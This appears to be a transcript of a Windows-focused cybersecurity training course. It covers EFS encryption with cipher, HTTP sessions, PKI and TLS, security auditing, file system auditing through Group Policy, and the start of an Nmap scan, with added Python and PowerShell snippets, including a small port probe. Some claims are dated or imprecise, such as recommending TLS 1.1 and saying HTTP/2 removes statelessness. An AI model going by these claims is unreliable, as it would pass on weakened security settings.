[Video description begins] He double-clicks the Administrator value in the second
row under the Issued To column header and the Certificate dialog box opens. It
contains three tabs: General, Details, and Certification Path. The General tab is
selected and it displays the Certificate Information. It also includes the Issuer
Statement button. [Video description ends]
The certificate has a lifetime after which it can no longer be used.
[Video description begins] He points to the information: Valid from 12/6/2018 to
11/12/2118. [Video description ends]
And in this case, it tells me I've got a private key that corresponds to the certificate
as well.
[Video description begins] He clicks the OK button and the Certificate dialog box
closes. [Video description ends]
Here in the Windows command line, we can also use the cipher executable program
to work with encrypted files related to EFS.
[Video description begins] He opens the Select Administrator: Command Prompt
window. It displays the C:\Data\Sample_Data_Files\PHI\2017_Patients>
prompt. [Video description ends]
So here, I've navigated to where those sample files are. And if I type dir, indeed, I
can see the files that we were working with.
[Video description begins] He executes the following command: dir. The output
includes the following file names: PHI-YHZ-004-0456-007.xls, PHI-YHZ-004-0456-008.xls, and PHI-YHZ-004-0456-009.xls. [Video description ends]
And as a matter of fact, if I flip over to Windows Explorer, there is our encrypted
file. It's got a 009 towards the end of the file name.
[Video description begins] He switches to the File Explorer window and points to
the PHI-YHZ-004-0456-009.xls file. [Video description ends]
So let's go back to the Command Prompt, and indeed, we do see the 009 file, but
we don't know if it's encrypted or not, not using dir we don't.
[Video description begins] He points to the PHI-YHZ-004-0456-009.xls file in the
output. [Video description ends]
So we can figure that out easily using the cipher command.
[Video description begins] He executes the following command:cls. [Video
description ends]
Now, the great thing about knowing how to do things at the command line is that
you can automate this.
[Video description begins] He executes the following command: cipher. The output
lists four files and indicate whether they are encrypted or unencrypted. The file
PHI-YHZ-004-0456-009.xls is encrypted and files PHI-YHZ-004-0456-007.xls,
PHI-YHZ-004-0456-008.xls and PHI_Automation_Test.txt are unencrypted. [Video
description ends]
What if you had to take a look at the encryption state of many different files across
many servers and different folders and, well, you could write a script pretty quickly
that would do that. Here when we look at the output of the cipher command, U
means unencrypted, E means encrypted. Indeed, we can see our 009 file in fact is
encrypted.
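As a sketch of that kind of automation, the Python script below walks a folder tree and reports which files carry the EFS encryption attribute. It relies on the Windows-only st_file_attributes field, and the starting folder is just the sample location from this demo:

import os
import stat

root = r"C:\Data\Sample_Data_Files\PHI"  # placeholder starting folder

for dirpath, _dirs, files in os.walk(root):
    for name in files:
        path = os.path.join(dirpath, name)
        attrs = os.stat(path).st_file_attributes
        flag = "E" if attrs & stat.FILE_ATTRIBUTE_ENCRYPTED else "U"
        print(flag, path)

Pointed at many folders or servers, the same loop gives a quick inventory of what is and isn't encrypted, much like cipher does for a single folder.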
I could also decrypt it right here at the command line. So instead of doing it in the GUI by right-clicking and going into properties, I could also run cipher /d for decrypt and, in this case, put in the file name of that entry. And after that, we
would be on our way. So I'm going to go ahead and specify the file name, in this
case, 009. Okay, so it says decrypting it, let's just clear the screen, let's run cipher
again.
[Video description begins] He executes the following command: cipher /d PHI-YHZ-004-0456-009.xls. [Video description ends]
And yeah, we can now see that it's got a U in front of it because now it's not
encrypted, it's unencrypted.
[Video description begins] He executes the following command: cipher and in the output, he points to the PHI-YHZ-004-0456-009.xls file, which is now unencrypted. [Video description ends]
Now let's go back into the GUI for a minute in Windows Explorer because let's say,
I right-click on the folder containing those sample files and go into Properties, go
into Advanced. Well, I've already flagged encryption at the folder level.
[Video description begins] He right-clicks the 2017_Patients folder in the first part
of the File Explorer window. A shortcut menu appears. He selects the Properties
option and the 2017_Patients Properties dialog box opens. It includes General,
Sharing, and Security tabs. Under the General tab, he clicks the Advanced button
and the Advanced Attributes dialog box opens. It contains two sections, Archive
and Index attributes and Compress or Encrypt attributes and OK and Cancel
buttons. The Archive and Index attributes section contains two checkboxes, Folder
is ready for archiving and Allow files in this folder to have contents indexed in
addition to file properties. Both the checkboxes are checked. The Compress or
Encrypt attributes section contains two checkboxes, Compress contents to save disk
space and Encrypt contents to secure data and Details button. The Encrypt
contents to secure data checkbox is checked. [Video description ends]
Now when you do that initially, it'll ask you if you want to encrypt what is already
in the folder. But in the future, newly added files should be encrypted
automatically. Let's see if that is true.
[Video description begins] He clicks the Cancel button and the Advanced Attributes
dialog box closes. He clicks the Cancel button and the 2017_Patients Properties
dialog box closes. [Video description ends]
I'm going to right-click here in this folder and create a new file called new. And I
can tell already, it's encrypted, we can see the little gold padlock icon.
[Video description begins] He right-clicks and a menu appears. He hovers over the
New option and a flyout menu appears. He clicks the Text Document option from
the flyout menu and a text box appears. He names it new. [Video description ends]
And of course, we could verify this at the command line by simply typing, cipher.
And indeed, our new encrypted file is listed.
[Video description begins] He switches to the Administrator: Command Prompt
window and executes the following command: cipher. In the output, he points to the
new.txt file which is encrypted. [Video description ends]
Exercise: Session Management and Encryption
[Video description begins] Topic title: Exercise: Session Management and
Encryption. The presenter is Dan Lachance. [Video description ends]
In this exercise, you will first describe three common risk treatments related to risk
management, and provide an example of each. After that, you'll describe HTTP
session management. Next, you'll explain how encrypting files on many servers
using Microsoft Encrypting File System, or EFS, can be automated. Finally, the last
thing you'll do is explain the relationship between PKI certificates and SSL/TLS.
Pause the video, think about these things carefully, and then come back to view the
solutions.
In risk management there are a number of different risk treatments, ways to manage that risk. One of these is risk mitigation, which applies when you implement a security control to either reduce or eliminate the risk, such as putting
a firewall in place to reduce the risk of incoming malicious traffic initiated from
outside the network. Risk avoidance is another risk treatment. What this means is
that we do not partake in a specific activity because the risk is too high compared to
the possible rewards. So we completely avoid it in the first place.
Risk transfer means you are outsourcing the risk to a third party, and one way that happens is through insurance, such as cyber liability insurance. For example, if you deal with customer data and that data is hacked, and people's sensitive information is then used for identity theft and so on, you could pay a monthly premium and transfer that type of risk to a cyber liability insurance company.
[Video description begins] HTTP Session Management. [Video description ends]
HTTP is generally a stateless protocol; certainly that is true of HTTP 1.0. After the web browser sends an HTTP command to the server and the server fulfills it, that is it, the session is done. The next time that same browser makes a request, it looks like a whole new connection from the server's perspective, unless something like HTTP/2 is in use.
So HTTP is the HyperText Transfer Protocol, and we know that version 1 is considered stateless. To deal with that, we have things like web browser cookies to retain information between connections from the browser to the server. And that cookie might contain sensitive information like a session ID or some kind of security token that authorizes the user to use a secured website.
[Video description begins] Communication stops upon HTTP transaction
completion. [Video description ends]
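To picture what such a cookie actually carries, here is a minimal Python sketch using the standard library http.cookies module; the cookie name and attributes are illustrative and not tied to any particular site:

from http import cookies
import secrets

# Server side: issue a random session ID once the user has authenticated.
jar = cookies.SimpleCookie()
jar["SESSIONID"] = secrets.token_hex(16)
jar["SESSIONID"]["secure"] = True     # only send over HTTPS
jar["SESSIONID"]["httponly"] = True   # keep it away from client-side scripts
print(jar.output())                   # the Set-Cookie header sent to the browser

# Later request: the browser echoes the cookie back, letting the server tie
# the new connection to the existing authenticated session.
echoed = cookies.SimpleCookie()
echoed.load("SESSIONID=" + jar["SESSIONID"].value)
print(echoed["SESSIONID"].value)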
So the cookie data, like a session ID, could be transmitted to the web server on future connections without the user having to authenticate again, as long as the session hasn't yet timed out. How can we automate EFS file encryption? We can use the GUI and
right-click on files and folders and go into the properties to enable encryption. But
otherwise, we could automate this by building a script. And that script, among
other things, would use the cipher.exe command that is built into Windows OS's
that support EFS.
Now the cipher command by itself will simply list files and directories in the current location, each preceded by either a U if the entry is unencrypted or an E if it's encrypted. To encrypt something from within our script, we can run cipher /e for encrypt, and then specify what needs to be encrypted, such as a file name. Inversely, we can decrypt using cipher /d. The
thing to watch out for though is if you're going to do this across a bunch of
machines, understand that EFS encryption encrypts the file for the user that is
logged on doing the encryption.
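A minimal sketch of that kind of script, assuming Windows' built-in cipher.exe and placeholder file paths, might look like this:

import subprocess

def set_efs(path, encrypt=True):
    # cipher /e encrypts, cipher /d decrypts; it acts as the logged-on user.
    switch = "/e" if encrypt else "/d"
    subprocess.run(["cipher", switch, path], check=True)

set_efs(r"C:\Data\Sample_Data_Files\PHI\2017_Patients\PHI-YHZ-004-0456-009.xls")
set_efs(r"C:\Data\Sample_Data_Files\PHI\2017_Patients\PHI-YHZ-004-0456-009.xls",
        encrypt=False)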
So, you can add other parties that should have the ability to decrypt, but this is the default behavior, so just bear it in mind. The next thing we'll do is distinguish the
difference, and the relationship also, between PKI, SSL, and TLS. PKI, or public
key infrastructure, really is a hierarchy of digital security certificates, that are
issued to users, devices, or even software applications. Among other things, the certificate contains a public key, and possibly a mathematically related private key. And these are used for encryption and
decryption and the creation of digital signatures, and all that great stuff that secures
a connection over the network.
Now SSL is a security protocol. So when people say SSL certificate, well, it’s
almost like a misnomer. A PKI certificate can be used for SSL or TLS or both at
the same time. So we don't really want to call it, technically, an SSL or a TLS
certificate, SSL is a security protocol. However, it's considered vulnerable and
deprecated, so we should try not to use it if we don't have to. TLS, or Transport
Layer Security, can be used. It supersedes SSL. Now you don't want to use TLS
1.0, because there are known vulnerabilities. If you can help it, don't use it. But try
to use version 1.1 and above. Again, TLS is a security protocol where, for example,
a web browser connecting to a server will negotiate the highest level of TLS that is
supported by both ends to deal with key exchange and so on.
Cybersecurity 101: Auditing & Incident
Response
This 12-video course explores selective auditing, which provides valuable insights
to activity on a network, and incident response plans, which are proactive measures
used to deal with negative events. Key concepts covered here include best practices
related to IT security auditing and their benefits, including assurance that IT
systems, business processes, and data are protected properly and that privileges are
not being abused; and how to use Group Policy to enable file system auditing.
Continue by observing how to scan hosts for security weaknesses from Windows
and how to scan hosts for security weaknesses from Linux; and learning the
importance of securing mobile devices. Next, you will learn how to centrally apply
security settings to mobile devices; how to configure Amazon Web Services to use
multifactor authentication; and examine how security is applied to applications
from design to use. Learn how to use file hashing to detect modifications; how to
specify actions used when dealing with security incidents; and learn to view a
packet capture to identify suspicious activity.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Dan Lachance, an IT Consultant and Trainer. [Video description ends]
Dan Lachance has worked in various IT roles since 1993, including as a technical trainer with Global Knowledge, a programmer, a consultant, as well as an IT tech author and editor for McGraw-Hill and Wiley Publishing. He has held and still
holds certifications in Linux, Novell, Lotus, CompTIA, and Microsoft. His
specialities over the years have included networking, IT security, cloud solutions,
Linux management, and configuration and troubleshooting across a wide array of
Microsoft products. Most end users have a general sense of IT security concepts.
But today's IT systems are growing ever larger and more complex. So now more
than ever, it's imperative to have a clear understanding of what digital assets are
and how to deal with security threats and vulnerabilities. Users need to acquire the
skills and knowledge to apply security mitigations at the organizational level. In
this course, Dan Lachance will use selective auditing to provide valuable insights to
activity on a network. He'll also cover how incident response plans are proactive
measures used to deal with negative events. Specifically, learners will explore how
to apply IT security skills to enable asset usage auditing and create incident response plans.
Security Auditing and Accountability
[Video description begins] Topic title: Security Auditing and Accountability. The
presenter is Dan Lachance. [Video description ends]
Periodic security audits can ensure that IT systems, business processes, and data are
protected properly and that privileges are not being abused.
[Video description begins] Security Auditing [Video description ends]
So we can track resource usage, where resources could be things like files,
databases, applications, secured devices, user accounts, and even changes made to
privileges for access to these resources. There are usually a number of driving
factors that will push an organization to conducting periodic security audits.
[Video description begins] Audit Driving Factors [Video description ends]
One of which is legal and regulatory compliance. For example, to remain in
compliance with HIPAA regulations related to protection of sensitive medical
information, certain types of security controls need to be in place. And this can be
determined through conducting periodic security audits. And the same thing would
be true for other bodies like PCI DSS, which is used for merchants that work with
cardholder data, the proper protection of that type of sensitive information.
Another driving factor would be to ensure continued customer confidence in the
organization. We should also establish an annual security baseline because if we
don't do that when we periodically conduct a security audit, we might not know
what is secure or what is not, compared to what is normal within the specific
organization. Also, we can use auditing to measure incident response effectiveness
as we audit how incidents are dealt with.
[Video description begins] Auditing Best Practices [Video description ends]
Some best practices relating to auditing begin with understanding that the unique
organization has specific business and security needs that will be different from
other organizations. And so as a result, the security policies will be unique. We
should only audit security principals of interest. A security principal is a user, a group, a device, or a piece of software. We don't want to enable auditing of, for example, access to every file on every file server for every user. We want to be a little bit
more specific than that. We also want to audit only relevant events, such as the
success of accessing a restricted database, or perhaps only auditing the failure of an
attempt to access a secure database.
So what we're talking about doing here is avoiding audit message fatigue. If you
audit too much, you'll be receiving too many audit message alerts and then it begins
to lose its meaning. We should also make sure that audit logs that retain audit
events themselves are protected. They should have auditing and access control
mechanisms applied. They should also be encrypted. We should store an additional
copy of audit logs away from the device that is itself being audited, in case it gets compromised. We should always ensure users have a unique logon account
because if we don't, then we don't have a way for users to be accountable for the
use of that account. And auditing always requires continuous centralized
monitoring because we want to make sure that over time, our security processes
and controls are still effective.
Auditing also includes conducting periodic scans, such as vulnerability scanning of
either a host or a network to identify weaknesses, such as ports that are open that
shouldn't be or missing software patches. Penetration testing is a little bit different
because instead of simply identifying vulnerabilities there is an attempt to exploit
those vulnerabilities. And this is done so that we can determine the security posture
of an organization. But the thing about penetration testing is that it's not passive like
vulnerability scanning. It can actually render systems unstable or even unusable if a
vulnerability is successfully exploited by the pen testing team.
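Looping back to the vulnerability-scanning point for a moment, even a few lines of Python give the flavor of that passive checking, probing whether well-known TCP ports answer on a host; the address and port list are placeholders, and real vulnerability scanners go far beyond this:

import socket

host = "192.168.0.231"  # placeholder target
for port in (22, 80, 443, 3389):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(1)
        state = "open" if s.connect_ex((host, port)) == 0 else "closed or filtered"
        print(port, state)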
Because of that disruptive potential, we have to make sure ahead of time, when a pen test is going to be conducted against an organization, that there are specific times of day set aside for this, and that non-disclosure agreements, or NDAs, are also signed by the
pen testers because they might gain access to very sensitive information as they run
penetration tests. We should also determine whether an internal versus an external
security auditing team should be used. To remain compliant with some regulations,
it might require that we have a third party or a set of external auditors conducting
the audit. There are a few types of security audits that can be conducted by security
IT teams, one of which is the Black Box test.
[Video description begins] Types of Security Audits [Video description ends]
This means that no implementation details are provided to the pen test team. And
so therefore, only public data is available to them to determine which systems are
in use, which versions, and how it's been implemented. So this is really the best
gauge of real attacks from the outside, when attackers would have no access to
internal information. Another type of audit or test is a White Box test, where
internal implementation details are provided. So this is the same type of knowledge
that employees might have. And we all know that sometimes, security breaches are
the result of insider jobs. So it's also important to conduct this type of test
periodically as well.
And certainly, it would be more thorough than a Black Box test because of the
amount of knowledge that would be available to the pen testers. Knowledge of
internal systems and processes, even software development and code review
practices used by the specific organization. Finally, we've also got Grey Box testing
where only some implementation details are provided to the pen test team. It could
be things like network documentation or organizational security policies, maybe
only a subset of those policies. So this is a good representation then of what social
engineering attackers might learn by tricking users into divulging some
information.
Enable Windows File System Auditing
[Video description begins] Topic title: Enable Windows File System Auditing. The
presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll use Windows Server 2016 to enable Windows File
System Auditing. File System Auditing allows us to track access to a given file, whether people are opening the file, attempting to open the file, attempting to delete it, and so on. To get started here on my server, I'm going to go
to my Start menu and fire up the Active Directory Users and Computers tool. This
server is an Active Directory domain controller. And so we're going to take a quick
peek at any user accounts that might be available or security principals that we
want to audit.
[Video description begins] The Active Directory Users and Computers window
opens. It is divided into four parts. The first part is the menu bar. The second part
is the toolbar. The third part is the Active Directory Users and Computers pane. It
contains the Saved Queries and fakedomain1.local root nodes. The
fakedomain1.local root node includes the LasVegas subnode, which further
contains the Computers, Groups, and Users subnodes. The Users subnode is
selected. The fourth part is the content pane. It contains a table. This table has the
column headers: Name, Type, and Description. The Name column header has the
value, User One. The Type column header has the value, User. The Description
column has no value. [Video description ends]
Here I've got a user called User One, so that is the account for which I'm going to audit access to a specific file in the file system.
[Video description begins] He selects the User One value in the Name column
header. [Video description ends]
Here in the file system on that same server, although it doesn't have to be the same
server, it could be just another server joined to the domain.
[Video description begins] He opens the File Explorer window. It is divided into
four parts. The first part is the menu bar. The second part includes the address bar.
The third part displays a list of drives and folders. The fourth part displays the
contents of the drive or folder selected in the third part. The Local Disk (C:) drive
is selected in the third part. The fourth part includes the Projects folder. [Video
description ends]
But I've got a file location here on Drive C called Projects. It's a folder in which
there are three sample files.
[Video description begins] He opens the Projects folder given in the fourth part. It
contains three files, named Project_A.txt, Project_B.txt, and Project_C.txt. [Video
description ends]
What I want to do is enable auditing of user one's access to the Projects folder here
on the server.
[Video description begins] He switches back to the list of contents displayed in the
fourth part. He closes the File Explorer window. [Video description ends]
The first thing we need to do is to turn on the option for auditing file systems. And
that is done through group policies. So on my server, I'll fire up my menu and go
into the Group Policy Management tool.
[Video description begins] The Group Policy Management window opens. It is
divided into four parts. The first part is the menu bar. The second part is the
toolbar. The third part contains the Group Policy Management root node. It
contains the Forest: fakedomain1.local subnode. It includes the Domains subnode.
This subnode contains the fakedomain1.local subnode, which further includes the
Default Domain Policy, Admins, Boston, and LasVegas subnodes. The Default
Domain Policy subnode is selected. The fourth part contains the Default Domain
Policy page. It contains the Scope, Details, Settings, and Delegation tabs and three
sections. The first section is Links. The second section is Security Filtering. The
third section is WMI Filtering. [Video description ends]
I want this applied at the entire Active Directory domain level. So I'm going to go
ahead and right-click Default Domain Policy, that is there automatically, and I'll
choose Edit.
[Video description begins] The Group Policy Management Editor window opens. It
is divided into four parts. The first part is the menu bar. The second part is the
toolbar. The third part includes the Computer Configuration and User
Configuration root nodes. The Computer Configuration root node contains the
Policies and Preferences subnodes. The User Configuration root node also
contains the Policies and Preferences subnodes. The fourth part displays the
information of the selected node in the third part. [Video description ends]
Now because auditing is a security item we're going to find that most security items
in group policy exist under Computer Configuration and not under User
Configuration. So under Computer Configuration, I'm going to go ahead and
expand Policies. Then I need to drill down under Windows Settings and then
Security Settings. And then finally, I've got my audit policy information listed
down at the bottom.
[Video description begins] He expands the Policies subnode. This subnode includes
the Windows Settings subnode. He expands this subnode. It includes the Security
Settings subnode. He expands this subnode. It includes the Advanced Audit Policy
Configuration subnode. He expands this subnode. It contains the Audit Policies
subnode. He expands this subnode. It includes the Object Access subnode. He
selects this subnode. The fourth part displays a table with the column headers:
Subcategory and Audit Events. [Video description ends]
So I'm going to expand Audit Policies > Object Access.
[Video description begins] He highlights the row entry: Subcategory: Audit File
System and Audit Events: Not Configured. [Video description ends]
Then on the right, I can see I have the ability to audit the file system as well as the
file shares, shared folders.
[Video description begins] He highlights the row entry: Subcategory: Audit File
Share and Audit Events: Not Configured. [Video description ends]
But I'm interested in the file system. I'm going to double-click on that and I'm going
to turn on the check mark to configure audit events for both success and failure.
[Video description begins] The Audit File System Properties dialog box opens. It
includes the Policy tab and the OK button. The Policy tab includes the Configure
the following audit events: checkbox. The Success and Failure checkboxes are
given below this checkbox. These are disabled. [Video description ends]
Maybe you want to audit when people successfully open project files or maybe you
only want to audit when people try to, but it fails, or maybe both as in my case.
[Video description begins] He selects the Configure the following audit events:
checkbox. The Success and Failure checkboxes get enabled. He selects these
checkboxes. [Video description ends]
I've turned those on, this is like the master switch.
[Video description begins] He clicks the OK button and the Audit File System
Properties dialog box closes. [Video description ends]
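As an aside, on a standalone server the same master switch can be flipped from a script using the built-in auditpol utility; this is only a sketch, and in a domain the Group Policy setting configured above would take precedence:

import subprocess

# Enable success and failure auditing for the File System subcategory.
subprocess.run(
    ["auditpol", "/set", "/subcategory:File System",
     "/success:enable", "/failure:enable"],
    check=True,
)

# Confirm the setting took effect.
subprocess.run(["auditpol", "/get", "/subcategory:File System"], check=True)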
The next thing I need to do is to go back into the file system to configure auditing
further. So here is the Projects folder that we were talking about.
[Video description begins] He switches to the File Explorer window. [Video
description ends]
So I've turned on the overall potential for auditing. But I'm not yet auditing the
Projects folder. To do that I need to right-click on that folder. The same step would
apply to an individual file that you want to audit too. I've right-clicked on the
folder, I'm going to go into the Properties, going to go under Security.
[Video description begins] The Project Properties dialog box opens. It includes the
Security tab. [Video description ends]
Then I'll click the Advanced button and then I'll click the Auditing tab.
[Video description begins] The Advanced Security Settings for Projects window
opens. It includes the Auditing tab. [Video description ends]
We can see down below currently, nobody is being audited at least for this folder
Projects.
[Video description begins] He clicks the Auditing tab. It displays a table with the
column headers: Type, Principal, Access, Inherited from, and Applies to and the
Add button. These column headers are empty. [Video description ends]
So I'm going to click Add.
[Video description begins] The Auditing Entry for Projects window opens. It
includes the Select a principal link, Type and Applies to drop-down list boxes, the
Full control, Modify, Read & execute, List folder contents, Read, Write, and
Special permissions checkboxes, and the OK button. The Type and Applies to drop-down list boxes and the Full control, Modify, Read & execute, List folder contents,
Read, Write, and Special permissions checkboxes are disabled. The Read &
execute, List folder contents, and Read checkboxes are selected. [Video description
ends]
And I'm going to click Select a principal, which in this case is going to be my user
uone, user one.
[Video description begins] The Select User, Computer, Service Account, or Group
dialog box opens. It includes the Enter the object name to select (examples): text
box and the Check Names button. This button is disabled. [Video description ends]
Now we could also specify a group and so on. I can determine if I want to audit the
success or failure or all types of events.
[Video description begins] He types uone in the Enter the object name to select
(examples): text box. The Check Names button gets enabled. He clicks this button.
The uone text changes to User One (UOne@fakedomain1.local). He then clicks the
OK button, and the dialog box closes. The Type and Applies to drop-down list
boxes and the Full control, Modify, Read & execute, List folder contents, Read, and
Write checkboxes get enabled. [Video description ends]
Well, let's say in this case, I'm going to choose All.
[Video description begins] He selects the All value in the Type drop-down list
box. [Video description ends]
And I don't care if it applies to the folder, subfolders or files within it, but I want to
start in the file system hierarchy at the Projects folder. And maybe I'm interested in
checking out the use of Read & execute, List folder contents, Read, and also let's
say maybe even Write.
[Video description begins] He selects the Write checkbox. [Video description ends]
So I've got this now set up, I'm going to click OK. There is my user principal that
I'm auditing for the Projects folder UOne.
[Video description begins] The column headers: Type, Principal, Access, Inherited
from, and Applies to, in the Advanced Security Settings for Projects window get
populated with the All, User One (UOne@fakedomain1.local), Read, write &
execute, None, and This folder, subfolders and files values, respectively. [Video
description ends]
I'll just click OK, and OK.
[Video description begins] The Advanced Security Settings for Projects window
closes. [Video description ends]
So to test this I'm going to connect as user one to the Projects folder and try to
access something because that should trigger events to be written to this server's
security log.
[Video description begins] The Projects Properties dialog box closes. [Video
description ends]
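Incidentally, if you ever need to script this step rather than click through the GUI, the same audit entry, known as a SACL, can be added with PowerShell. Treat the following as a minimal sketch that mirrors the demo; the path, account, and rights are assumptions you would adjust for your environment, and it needs to run elevated:

# Read the folder's ACL, including the audit (SACL) entries
$acl = Get-Acl -Path 'C:\Projects' -Audit
# Build an audit rule for UOne: Read & execute plus Write, inherited by subfolders and files, for success and failure
$rule = [System.Security.AccessControl.FileSystemAuditRule]::new('FAKEDOMAIN1\UOne', 'ReadAndExecute, Write', 'ContainerInherit, ObjectInherit', 'None', 'Success, Failure')
$acl.AddAuditRule($rule)
# Write the updated ACL back to the Projects folder
Set-Acl -Path 'C:\Projects' -AclObject $acl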
Before I test this I'm just going to share out this Projects folder on the network.
[Video description begins] He right-clicks the Projects folder and selects the
Properties option. The Projects Properties dialog box opens. [Video description
ends]
So I'm going to right-click, go into the Properties, go into Sharing and I'll click
Advanced Sharing.
[Video description begins] He clicks the Sharing tab. It includes the Advanced
Sharing button. [Video description ends]
I want to share the folder as Projects.
[Video description begins] He clicks the Advanced Sharing button. The Advanced
Sharing dialog box opens. It includes the Share this folder checkbox and the
Permissions and OK buttons. The Share this folder checkbox is selected. [Video
description ends]
And for the permissions, if I click Permissions, we can see everyone has got at least
Read, so I'll just add Read and Change.
[Video description begins] He hovers over the Share this folder checkbox. [Video
description ends]
And of course I can also specify further permissions or less permissions for specific
files in that folder.
[Video description begins] The Permissions for Projects dialog box opens. It
includes a table with the column headers: Permissions for Everyone, Allow, and
Deny. The Permissions for Everyone column header has the values: Full Control,
Change, and Read. The Allow and Deny column headers have three checkboxes.
The checkbox in the Allow column header for the Read value in the Permissions for
Everyone column header is selected. [Video description ends]
For example, if I look at the Project_A.txt file and go into Properties.
[Video description begins] He selects the checkbox in the Allow column header for
the Change value in the Permissions for Everyone column header. [Video
description ends]
I could go into Security for it and determine the permissions that are assigned at the
individual NTFS file level.
[Video description begins] He closes the Permissions for Projects dialog
box. [Video description ends]
And remember that when you combine share and NTFS folder permissions, the most
restrictive applies.
[Video description begins] He closes the Projects Properties dialog box and opens
the Projects folder. [Video description ends]
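As an aside, the share itself can also be created from the command line instead of the Sharing tab; here is a rough sketch that assumes the folder sits at C:\Projects (the /GRANT value is quoted so it also parses cleanly if you run it from PowerShell):

# Share C:\Projects as Projects and grant Everyone the Change share permission
net share Projects=C:\Projects "/GRANT:Everyone,CHANGE"
# Confirm the share and its permissions
net share Projects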
From a Windows 10 station, I'm going to try to connect to the UNC path of that host,
double backslash.
[Video description begins] The Project_A.txt Properties dialog box opens. It
includes the Security tab and the Cancel button. [Video description ends]
I know the IP address and I know that the folder here is called Projects.
[Video description begins] He clicks the Security tab. It includes the Group or user
names list box and a table. The Group or user names: text box includes the Users
(FAKEDOMAIN1\Users) value. He selects this value. The table shows the column
headers: Permissions for Users, Allow, and Deny. The Permissions for Users
column header has the values: Full Control, Modify, Read & Execute, Read, Write,
and Special permissions. The Allow column has two tick marks for the Read &
Execute and Read values in the Permissions for Users column header. The Deny
column has no value. [Video description ends]
So I'm being prompted to authenticate.
[Video description begins] He hovers over the tick marks. [Video description ends]
So the domain is fakedomain1\, the user name is uone and I'll pop in the password
for that account.
[Video description begins] He clicks the Cancel button and the Project_A.txt
Properties dialog box closes. [Video description ends]
Now we can see those files.
[Video description begins] He opens another File Explorer window. [Video
description ends]
So I'm going to go ahead and try to open up Project_A.txt.
[Video description begins] He types \\192.168.0.231\projects in the address bar
and presses the Enter key. The Windows Security dialog box opens. It includes the
User name and Password text boxes and the OK button. He types
fakedomain1\uone in the User name text box and password in the Password text
box. He then clicks the OK button to close the dialog box. [Video description ends]
And we can see indeed that the Project_A.txt file, which only contains sample text
has actually been opened up.
[Video description begins] He switches back to the previous File Explorer window.
He opens the Project_A.txt file. [Video description ends]
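For what it's worth, the same connection test can be made from a command prompt on the Windows 10 station instead of File Explorer; a quick sketch, reusing the IP address, share name, and account from the demo:

# Map the share, prompting interactively for UOne's password (that is what the trailing * does)
net use \\192.168.0.231\Projects /user:fakedomain1\uone *
# List the files and read one, which should generate audit events on the server
dir \\192.168.0.231\Projects
type \\192.168.0.231\Projects\Project_A.txt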
So we've gone ahead and accessed that file. Now bear in mind, in order for this to
trigger the audit event to be written to the security log of the server, group policy
needs to have been refreshed on affected machines, such as on the server that we
are auditing. That refresh should happen automatically on the server.
[Video description begins] He switches back to the File Explorer window. [Video
description ends]
But if you're actually testing this and it's not working, and you've done the
configuration very quickly, you might want to go into a Command Prompt on the
server and then force a Group Policy refresh such as gpupdate /force.
[Video description begins] He clicks the Start menu and types cmd. The Command
Prompt option appears. He selects this option. The Administrator: Command
Prompt window opens. The C:\Users\Administrator> prompt is displayed. [Video
description ends]
And if you see messages like Computer Policy update has completed successfully,
User Policy update has completed successfully, you know you're good on the
server that you've configured to audit.
[Video description begins] He executes the gpupdate /force command. The
C:\Users\Administrator> prompt is displayed. [Video description ends]
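And if you want to double-check that the refreshed policy actually took effect before you go looking for events, you can query the effective audit policy from that same prompt; just a quick sketch:

# Show the effective audit settings for every Object Access subcategory, including File System
auditpol /get /category:"Object Access"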
Because the computer policy, as you recall, when we were configuring it, is where
we drilled down into the security section to configure the auditing. So on the server
that has the file system that I'm auditing, I'm going to go ahead and take a look at
the Event Viewer. So, from the Start menu, I'll start typing its name, and I'll go into the Event
Viewer.
[Video description begins] He clicks the Start menu and types eve. The Event
Viewer option appears. He selects this option. The Event Viewer window opens. It
is divided into five parts. The first part is the menu bar. The second part is the
toolbar. The third part is the Event Viewer (Local) pane. It includes the Custom
Views and Windows Logs root nodes. The fourth part is the content pane. It
displays the information of the node selected in the Event Viewer (Local) pane. The
fifth part is the Actions pane. [Video description ends]
What I want to do is drill down on the left under Windows Logs and Security Log.
[Video description begins] He expands the Windows Logs root node. It includes the
Security option. [Video description ends]
That is where auditing events get written.
[Video description begins] He selects the Security option. The Security page opens
in the content pane. It is divided into two parts. The first part includes a table with
the column headers: Keywords, Date and Time, Source, Event ID, and Task
Category. The second part includes the General tab. [Video description ends]
And over on the right, I can either search or I can see I've got an audit message
listed here for FAKEDOMAIN1\UOne.
[Video description begins] He selects the row entry: Keywords: Audit Success,
Date and Time: 1/8/2019 10:14:29 AM, Source: Microsoft Windows security, Event
ID: 4656, and Task Category: File System. The General tab includes Security ID:
FAKEDOMAIN1\UOne and Object Name: C:\Projects\Project_A.txt. [Video
description ends]
And see what else it says.
[Video description begins] He highlights UOne in Security ID:
FAKEDOMAIN1\UOne. [Video description ends]
And it looks like that user read a file here called Project A.txt.
[Video description begins] He highlights Project_A.txt in the Object Name:
C:\Projects\Project_A.txt. [Video description ends]
And of course, we can see the date and time stamp that goes along with that audit
event.
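As a side note, once events are being generated you don't have to hunt for them by hand in Event Viewer; a short PowerShell query against the Security log can pull them out. This is only a sketch; event IDs 4656 (a handle to an object was requested) and 4663 (an attempt was made to access an object) are the usual file system auditing IDs, but what you actually see depends on what you enabled:

# Pull recent file system audit events and keep the ones that mention Project_A.txt
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4656, 4663 } -MaxEvents 50 |
    Where-Object { $_.Message -match 'Project_A\.txt' } |
    Select-Object TimeCreated, Id, Message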
Conduct a Vulnerability Assessment Using Windows
[Video description begins] Topic title: Conduct a Vulnerability Assessment Using
Windows. The presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll conduct a network vulnerability scan from a Windows 10
station. The problem is that Windows 10 does not include a vulnerability scanner
by default within the operating system. But that is okay because we can go and
download the free Nmap tool which I've already done. So I'm going to go to my
Start menu, type in nmap, and there it is: the Zenmap tool, the front-end GUI that
is part of Nmap.
[Video description begins] The Zenmap window opens. It is divided into four parts.
The first part is the menu bar. The second part contains the Target combo box, the
Profile drop-down list box, Command text box, and the Scan and Cancel buttons.
The Intense scan value is selected in the Profile drop-down list box. The Command
text box has the command, nmap -T4 -A -v. The third part contains the Hosts and
Services buttons and the OS and Host column headers. The fourth part contains the
Nmap Output, Ports / Hosts, Topology, Host Details, and Scans tabs. The Nmap
Output tab is selected. It displays a drop-down list box and the Details button.
These are disabled. [Video description ends]
